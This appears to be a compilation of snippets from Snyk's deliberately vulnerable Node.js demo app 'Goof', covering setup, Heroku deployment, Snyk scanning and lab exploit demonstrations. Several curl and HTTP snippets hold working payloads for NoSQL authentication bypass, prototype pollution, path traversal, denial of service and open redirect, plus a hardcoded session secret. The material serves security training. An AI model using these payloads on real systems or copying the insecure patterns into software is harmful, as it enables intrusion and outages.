### Install and Run Snyk Wizard for Vulnerability Fixing
Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md
These commands demonstrate the process of installing the Snyk CLI globally and then running the 'snyk wizard' command. The wizard guides users through fixing detected vulnerabilities in their projects, with default answers often resolving all issues in this specific application.
```bash
npm install -g snyk
snyk wizard
```
--------------------------------
### Running Goof Locally
Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md
Commands to clone the Goof repository, install dependencies, and start the Node.js application locally. Assumes a local MongoDB instance is running.
```bash
mongod &
git clone https://github.com/snyk-labs/nodejs-goof
npm install
npm start
```
--------------------------------
### Install Heroku CLI on macOS
Source: https://github.com/snyk-labs/nodejs-goof/blob/main/deploy-heroku.md
Installs the Heroku Command Line Interface (CLI) on macOS using Homebrew. This tool is essential for interacting with the Heroku platform.
```shell
brew install heroku/brew/heroku
```
--------------------------------
### Run MySQL Database
Source: https://github.com/snyk-labs/nodejs-goof/blob/main/exploits/prototype-pollution-typeorm.md
Starts a MySQL 5 Docker container for demonstration purposes, exposing port 3306 and setting the root password to 'root'. This allows for easy database setup for testing TypeORM vulnerabilities.
```sh
docker run -p3306:3306 --rm --name mysqld -e MYSQL_ROOT_PASSWORD=root mysql:5
```
--------------------------------
### Running Goof with Docker Compose
Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md
Commands to build and start the Goof application using Docker Compose, and to stop and remove the containers.
```bash
docker-compose up --build
docker-compose down
```
--------------------------------
### Open Redirect and XSS via redirectPage Parameter
Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md
This example highlights an open redirect vulnerability and a potential Cross-Site Scripting (XSS) vulnerability in the '/admin' view. The 'redirectPage' query parameter is rendered unescaped using Handlebars' '<%- %>', allowing for both redirection to arbitrary external sites and script injection.
```http
http://localhost:3001/login?redirectPage=">
```
```http
http://localhost:3001/admin?redirectPage=https://google.com
```
--------------------------------
### Get User Profile (Normal Request)
Source: https://github.com/snyk-labs/nodejs-goof/blob/main/exploits/prototype-pollution-typeorm.md
Sends a GET request to the /users endpoint to retrieve the profile of the currently logged-in user. In the normal flow, this hard-coded user (ID: 1) is returned.
```sh
curl --request GET \
--url http://localhost:3001/users \
--header 'content-type: application/json'
```
--------------------------------
### Create a Heroku App
Source: https://github.com/snyk-labs/nodejs-goof/blob/main/deploy-heroku.md
Creates a new application instance on the Heroku platform. This command provisions a new Heroku app with a unique name and Git URL.
```shell
heroku create
```
--------------------------------
### Authenticate to Heroku
Source: https://github.com/snyk-labs/nodejs-goof/blob/main/deploy-heroku.md
Logs the user into the Heroku CLI. This command initiates an authentication flow, typically opening a web browser for confirmation.
```shell
heroku login
```
--------------------------------
### Deploy Goof App to Heroku
Source: https://github.com/snyk-labs/nodejs-goof/blob/main/deploy-heroku.md
Deploys the current application code from the local Git repository to the Heroku platform. It pushes the 'master' branch to the 'heroku' remote.
```shell
git push heroku master
```
--------------------------------
### View Heroku App Logs
Source: https://github.com/snyk-labs/nodejs-goof/blob/main/deploy-heroku.md
Streams the logs from the Heroku application in real-time. The '--tail' flag ensures that new log entries are continuously displayed.
```shell
heroku logs --tail
```
--------------------------------
### Restart Heroku App
Source: https://github.com/snyk-labs/nodejs-goof/blob/main/deploy-heroku.md
Manually restarts the dynos (processes) for the Heroku application. Setting 'web=1' ensures that at least one web process is running and restarted.
```shell
heroku ps:scale web=1
```
--------------------------------
### Running MongoDB with Docker
Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md
Command to run a MongoDB version 3 instance using Docker, which is required by some older libraries used in the Goof application.
```bash
docker run --rm -p 27017:27017 mongo:3
```
--------------------------------
### Add MongoDB Addon to Heroku App
Source: https://github.com/snyk-labs/nodejs-goof/blob/main/deploy-heroku.md
Adds a MongoDB addon (specifically the 'sandbox' plan) to the current Heroku application. This provides a managed MongoDB database instance.
```shell
heroku addons:create mongolab:sandbox
```
--------------------------------
### Run Node.js App with Runtime Monitoring
Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md
This command illustrates how to run a Node.js application with Snyk's runtime monitoring enabled. It requires setting the SNYK_PROJECT_ID environment variable to associate the monitored application with a specific Snyk project for reporting detected vulnerabilities.
```bash
SNYK_PROJECT_ID= npm start
```
--------------------------------
### Scan Docker Image for Vulnerabilities
Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md
This command demonstrates how to use the Snyk CLI to scan a Docker image for system libraries with known vulnerabilities. It specifies the Docker image and the Dockerfile for context.
```bash
snyk test --docker node:6-stretch --file=Dockerfile
```
--------------------------------
### Monitor Docker Image with Snyk
Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md
This command shows how to use the Snyk CLI to monitor a Docker image. Monitoring allows Snyk to provide alerts for new vulnerabilities discovered in the image over time.
```bash
snyk monitor --docker node:6-stretch
```
--------------------------------
### Cleanup Goof Database Entries
Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md
Command to execute a script that bulk deletes TODO items from the application's database.
```bash
npm run cleanup
```
--------------------------------
### Create Dummy Database
Source: https://github.com/snyk-labs/nodejs-goof/blob/main/exploits/prototype-pollution-typeorm.md
Creates a database named 'acme' within the running MySQL instance. This database is used by the TypeORM application for storing user data and demonstrating the exploit.
```sql
create database acme;
```
--------------------------------
### Create New User (Normal Request)
Source: https://github.com/snyk-labs/nodejs-goof/blob/main/exploits/prototype-pollution-typeorm.md
Sends a POST request to the /users endpoint to create a new user with a name, address, and role. This demonstrates a standard, non-malicious interaction with the application.
```sh
curl --request POST \
--url http://localhost:3001/users \
--header 'content-type: application/json' \
--data '{\
"name": "a",\
"address": "vvv",\
"role": "user"\
}'
```
--------------------------------
### Access MySQL Client
Source: https://github.com/snyk-labs/nodejs-goof/blob/main/exploits/prototype-pollution-typeorm.md
Provides a command to access the MySQL client interactively within the running 'mysqld' container. This allows users to inspect database records and verify the effects of the exploit.
```sh
docker exec -it mysqld mysql -uroot -p
```
--------------------------------
### Denial of Service via Sanitizer (validator.rtrim)
Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md
This command demonstrates a denial of service vulnerability using the 'validator.rtrim()' sanitizer. By sending a long string to the 'firstname' field, an attacker can exploit a weakness in the sanitizer to cause a denial of service on the '/account_details' endpoint.
```curl
curl -X 'POST' -H 'Content-Type: application/json' --data-binary "{\"email\": \"someone@example.com\", \"country\": \"nop\", \"phone\": \"0501234123\", \"lastname\": \"nop\", \"firstname\": \"`node -e 'console.log(\" \".repeat(100000) + \"!\")'`\"}" 'http://localhost:3001/account_details'
```
--------------------------------
### Initialize Node.js Session with Hardcoded Secret
Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md
This snippet shows the initialization of a cookie-based session in a Node.js application. It highlights the 'secret' parameter used to sign the session, which is hardcoded directly in the code, posing a security risk. Snyk Code can detect this hardcoded secret.
```javascript
app.use(session({
secret: 'keyboard cat',
name: 'connect.sid',
cookie: { secure: true }
}))
```
--------------------------------
### Denial of Service via Regex (Email Validation)
Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md
This command illustrates a Regular Expression Denial of Service (ReDoS) vulnerability in the 'validator' library used for email validation. By providing a crafted, excessively long string to the 'email' field with the '{allow_display_name: true}' option, an attacker can trigger a denial of service on the '/account_details' route.
```curl
curl -X 'POST' -H 'Content-Type: application/json' --data-binary "{\"email\": \"`seq -s \"\" -f \"<\" 100000`\"}" 'http://localhost:3001/account_details'
```
--------------------------------
### Code Injection via Handlebars (Path Traversal)
Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md
This snippet demonstrates a code injection vulnerability in a Node.js application using Handlebars for server-side rendering. By manipulating the 'layout' parameter in a POST request to '/account_details', an attacker can achieve Local File Inclusion (Path Traversal) by including sensitive files like 'package.json'.
```curl
curl -X 'POST' --cookie c.txt --cookie-jar c.txt -H 'Content-Type: application/json' --data-binary '{"username": "admin@snyk.io", "password": "SuperSecretPassword"}' 'http://localhost:3001/login'
```
```curl
curl -X 'POST' --cookie c.txt --cookie-jar c.txt -H 'Content-Type: application/json' --data-binary '{"email": "admin@snyk.io", "firstname": "admin", "lastname": "admin", "country": "IL", "phone": "+972551234123", "layout": "./../package.json"}' 'http://localhost:3001/account_details'
```
--------------------------------
### Fix Node.js Session Secret by Moving to Config File
Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md
This code snippet demonstrates a first attempt to fix a hardcoded session secret by moving it to a separate configuration file. While it removes the secret from the main application file, Snyk Code will still flag it as it resides within the project's codebase.
```javascript
module.exports = {
cookieSecret: `keyboard cat`
}
```
--------------------------------
### Exploit: Poison Prototype via User Creation
Source: https://github.com/snyk-labs/nodejs-goof/blob/main/exploits/prototype-pollution-typeorm.md
Submits a POST request to /users that includes a nested '__proto__' object. This payload exploits an insecure merge in TypeORM, injecting a 'where' property into Object.prototype, which can alter query behavior.
```sh
curl --request POST \
--url http://localhost:3001/users \
--header 'content-type: application/json' \
--data '{\
"name": "a",\
"address": {\
"__proto__": {\
"where": {\
"id": "2",\
"where": null\
}\
}\
}\
}'
```
--------------------------------
### NoSQL Injection via Password Field
Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md
This snippet shows a NoSQL injection vulnerability in the login functionality. By sending a crafted JSON object as the password, specifically `{"username": "admin@snyk.io", "password": {"$gt": ""}}`, an attacker can bypass authentication by exploiting MongoDB's '$gt' operator to match any record.
```httpie
echo '{"username": "admin@snyk.io", "password": {"$gt": ""}}' | http --json $GOOF_HOST/login -v
```
=== COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.